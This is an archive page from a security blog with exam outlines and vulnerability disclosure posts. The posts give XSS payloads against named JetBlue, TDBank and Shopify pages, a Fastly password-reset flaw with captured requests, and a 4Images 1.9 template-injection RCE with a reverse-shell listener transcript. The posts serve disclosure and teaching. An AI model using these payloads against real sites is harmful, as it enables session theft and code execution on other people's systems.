MSecure: March 2023

Tuesday 21 March 2023

OSCP / OSWP Certificate Pentests - Intro

Information

OSCP

Requires information gathering
Web vulnerabilities version checks
Bypass specific tweak flawed
Knowledge of exploiting flaws

OSWP

Requires WiFi pentest techniques
Tools for WiFi capture traffic
Exploiting vulnerabilities in WiFi
Tools cracking hashes found

Exploit

OWASP Top 10 knowledge

SQL inject
Cross site script
Local file include
Remote file include
Information gather files

OSCP syllabus knowledge
OSWP syllabus knowledge
Kali Linux tools usage

Nikto
Dirb
Metasploit
Burpsuite Free Edition
NMap

SynAck Red Team Asssessment - Intro

Application

Several web applications

Need to complete all

Three infrastructure hosts

Need to complete all

Information

Requires web pentest techniques

Requires information gathering
Fuzzing host files
Bypass specific tweak flawed
Knowledge of exploiting flaws

Requires host pentest techniques

Tools for port scans
Scans for services expose
Exploiting vulnerabilities
Privilege escalate issues found

Exploit

OWASP Top 10 knowledge
Kali Linux tools usage

Nikto
Dirb
Metasploit
Burpsuite Free Edition
NMap

Sunday 19 March 2023

Full Disclosure - JetBlue Reflected Cross Site Script

Application

JetBlue chat web page

Information

Input not validated
Reflect Cross Site Scripting flaw

Exploit

XSS #1

1. Browse to Online Website

2. Select "/deals/from/new-york-city" page -> Search

2. Select Pages -> Have General Question -> Ask now

3. Paste Payload -> TEST"><img src=x onerror=alert(1)>

Thursday 16 March 2023

Full Disclosure - TDBank Reflected Cross Site Script

Application

TDBank chat web page

Information

Input not validated
Reflect Cross Site Scripting flaw

Exploit

XSS #1

1. Browse to Online Store

1. Browse to Personal Banking -> Contact Us

2. Select Pages -> Have General Question -> Ask now

3. Paste Payload -> TD Bank SWIFT/BIC code"><iframe width="1000px" height="450px" src="" onload=alert('XSS')>

Sunday 12 March 2023

Full Disclosure - Fastly Password Reset Flaw

Application

Fastly web application

Information

Weak password requirements
No checks for password control

Exploit

Password Reset Flawed
1. Reset user password
2. Access link sent
3. Temporary password sent plaintext

// HTTP POST request
POST /user/mwebsec%40gmail.com/password/request_reset HTTP/2
Host: api.fastly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...]
{"g-recaptcha-response":"03AFY_a8UY[...]"}
[...]

// HTTP response
HTTP/2 200 OK
Cache-Control: no-store
[...]

// HTTP GET request
GET /auth/user/3lWtx49FrV2.../password/reset/f496875e6e1d88d80aa5.../1677948661/2f2ea8d230adaf03bd749081d... HTTP/2
Host: manage.fastly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]

// HTTP response
HTTP/2 200 OK
Cache-Control: public, max-age=60, stale-if-error=1209600, stale-while-revalidate=600
[...]

Password Change Misconfig
1. Login to user account
2. Click Account -> Personal Profile
3. Select Change Password -> Current Password -> FastLy%2540!1M
4. Select New Password -> P.P.P.P.P.P.P -> Confirm Password -> P.P.P.P.P.P.P
5. Select Sign Out Option
6. Login with new password

// HTTP POST request
POST /oauth/password HTTP/2
Host: api.fastly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...]
client_id=fastly-ui&grant_type=password&new_password=P.P.P.P.P.P.P&old_password=FastLy%2540!1M&username=mwebsec%40gmail.com
[...]

// HTTP response
HTTP/2 401 Unauthorized
Status: 401 Unauthorized
Cache-Control: no-store
Content-Type: application/json
[...]
[...]
{"msg":"Token 3kzBPKXbsbtZBl9..."}
[...]

// HTTP POST request
POST /oauth/access_token HTTP/2
Host: api.fastly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...]
client_id=fastly-ui&grant_type=password&password=P.P.P.P.P.P.P&username=mwebsec%40gmail.com
[...]

// HTTP response
HTTP/2 200 OK
Status: 200 OK
[...]
[...]
{"id":"7IU53vPHZ...",
"name":"manage.fastly.com browser session",
"user_id":"3lWtx49FrV...",
"customer_id":"535znFHg...",
[...]
"token_type":"bearer",
"scope":"global",
"services":[],
"access_token":"qwdBQF43O..."}
[...]

Full Disclosure - Shopify Application Stored Cross Site Script

Application

Shopify web application

Information

Input not validated
Stored Cross Site Scripting flaw

Exploit

XSS #1

1. Browse to Online Store

2. Select Pages -> Add Page

3. Set Title -> Title_Name

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML

6. Fix HTML encoding of tags

// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

"page":{"bodyHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]

// HTTP response

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name"

[...]

XSS #2

1. Browse to Online Store

2. Select Blog Posts -> Add Blog Post

3. Set Title -> Blog_Title

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML

6. Fix HTML encoding of tags

// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2"

[...]

XSS #3

1. Browse to Products

2. Select Collections -> Create Collection

3. Set Title -> Collection_Title

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML

6. Fix HTML encoding of tags

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"

[...]

XSS #4

1. Browse to Products

2. Select Inventory-> View Products

3. Select Product -> Title -> Product_Title

4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML

6. Fix HTML encoding of tags

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

"product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>","workflow":"product-details-update"

[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>"

[...]

XSS #5

1. Browse to Products

2. Add Product -> Title -> Product_Title

3. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

4. Select Show HTML

5. Fix HTML encoding of tags

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

"product":{"descriptionHtml":"<p> </p>...\"><script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n</code></pre>"

[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

"title":"Gift_Title","><script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n</code></pre>",

[...]

XSS #6

1. Browse to Products

2. Select Gift Cards

3. Add Gift Card Products -> Gift_Title

4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML

6. Fix HTML encoding of tags

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"

[...]

Full Disclosure - 4Images 1.9 Remote Code Execute

Application

4Image 1.9
URL download

https://www.4homepages.de/download-4images

Information

Application vulnerable to code injection via user input

Exploit

1. Login as administrator user
2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=1";


// HTTP POST request showing reverse shell payload

POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]


// HTTP redirect response to specific template

GET /4images/categories.php?cat_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux
 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-session
kali     pts/1    -                11:58    1:40  24.60s  0.14s sudo su
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$

MSecure

Tuesday 21 March 2023

OSCP / OSWP Certificate Pentests - Intro

SynAck Red Team Asssessment - Intro

Sunday 19 March 2023

Full Disclosure - JetBlue Reflected Cross Site Script

Thursday 16 March 2023

Full Disclosure - TDBank Reflected Cross Site Script

Sunday 12 March 2023

Full Disclosure - Fastly Password Reset Flaw

Full Disclosure - Shopify Application Stored Cross Site Script

Full Disclosure - 4Images 1.9 Remote Code Execute

Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

Report Abuse